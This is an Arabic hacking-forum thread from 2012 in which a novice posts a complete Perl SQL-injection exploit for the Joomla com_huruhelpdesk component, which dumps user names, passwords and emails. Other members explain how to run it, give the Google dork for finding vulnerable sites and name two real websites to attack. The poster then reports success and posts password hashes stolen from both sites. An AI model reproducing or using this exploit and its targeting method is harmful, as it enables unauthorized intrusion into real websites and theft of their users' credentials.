وصلت لمرحلة اليأس

Qroy hacker · 11-26-2012, 07:00 PM

سلام عليكم ورحمة الله وبركاتة ..
كيف الحال ان شاء الله بخير

وصلت لمرحلة اليأس

بصراحة بديت بتعلم حقن قواعد بيانات sql
وتعلمت عليها جيداً
لكن دائماً تجيني مشاكل بها ، وهي عدم وجود لوحه تحكم بعض المواقع أحياناً يجي اخطاء غريبة
لاعرف لها حل
مثل ، لايطلع الجدول المطلوب
والخ من المشاكل

قلت بشوف ثغرات سكربت جملا ، والورد بريس
بس للاسف ماعرفت لها ..
حاولت اترجم مافهمت كيف استغل

مثلا هاذي الثغرة

كود PHP:

  #Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection  #Google Dork: "inurl:option=com_huruhelpdesk"#Date: 04/10/2012#Exploit Author: D35m0nd142#Vendor Homepage: http://www.huruhelpdesk.net/#Tested on Joomla 1.5 #CVE: 2010-2907  #!/usr/bin/perlsystem("clear");print "***************************************\n";print " Joomla Component com_huruhelpdesk    *\n";print "      SQL Injection exploit           *\n";print "      Created by D35m0nd142           *\n";print "***************************************\n\n";use LWP::UserAgent;print "Target page [ex: http://www.site.com/dir] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website=  $target .  "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){print "[+] Password found --> $1\n\n";sleep 1;}else{print "No password found :(\n";}   # 1337day.com [2012-11-26]

الي فهمته منها ادخل على الدوس
واكتب
cd..
cd..
نتحول لقرص الـc
من ثم
cd perl
وننتقل لـperl
ومن ثم cd bin
ومن ثم اروح للي حفظته بمجلد bin
وكمثال سميته kk.pl
اكتب kk.pl
يجي هكذا

كود PHP:

  C:\Perl\bin>ksa.pl
'clear' is not recognized as an internal or external command,
operable program or batch file.
***************************************
 Joomla Component com_huruhelpdesk    *
      SQL Injection exploit           *
      Created by D35m0nd142           *
***************************************

Target page [ex: http://www.site.com/dir] -->

الآن ماذا افعل ،

طفشت بصراحة ولا مرة سويت شي صح

حتى الثغرات مافهم لها

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC ,wgj glvpgm hgdHs

المفترس · 11-26-2012, 08:04 PM

يلزمك target اي هدف تضعه مع اسم الملف هكدا ksa.pl target site وان لم يعمل فاعلم ان يوجد خطا في برمجة الملف او لم تنقله صح او ملف يعمل على نظام غير نظامك

Qroy hacker معجب بهذا

ChucK NoRRis · 11-26-2012, 08:49 PM

يلزمك تضع رابط موقع مصاب
و الموقع المصاب تحصلو بالدورك المرفق مع الثغرة

كود:

inurl:"option=com_huruhelpdesk"

ولما تظغط انتر راح يقوم بالواجب و يجيبلك الباس بس مشفرة
وهاذم موقعين مصابين يمكن تجرب عليهم

كود:

http://www.rocktopia.co.uk/
http://www.itonwork.dk/

Qroy hacker معجب بهذا

Qroy hacker · 11-27-2012, 12:12 AM

الله يعطيكم العافية يا أبطال وتم بحمدلله ..
معرفه كيف إستغلال الثغره ..
بالنسبة للمواقع الي طرحها اخوي ChucK NoRRis
هذا الهاش للموقع الاول
457c65286f6c682607136716b9fa8332
الموقع الثاني
4dba85486a30492103d1eb533f8a2e1f

ان شاء الله .. لاحتراف أكبر

وصلت لمرحلة اليأس

جـــ'ابات العناكــ'ب